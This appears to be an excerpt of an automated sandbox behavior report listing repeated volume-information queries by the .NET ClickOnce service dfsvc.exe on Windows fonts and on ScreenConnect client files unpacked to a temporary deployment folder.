Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
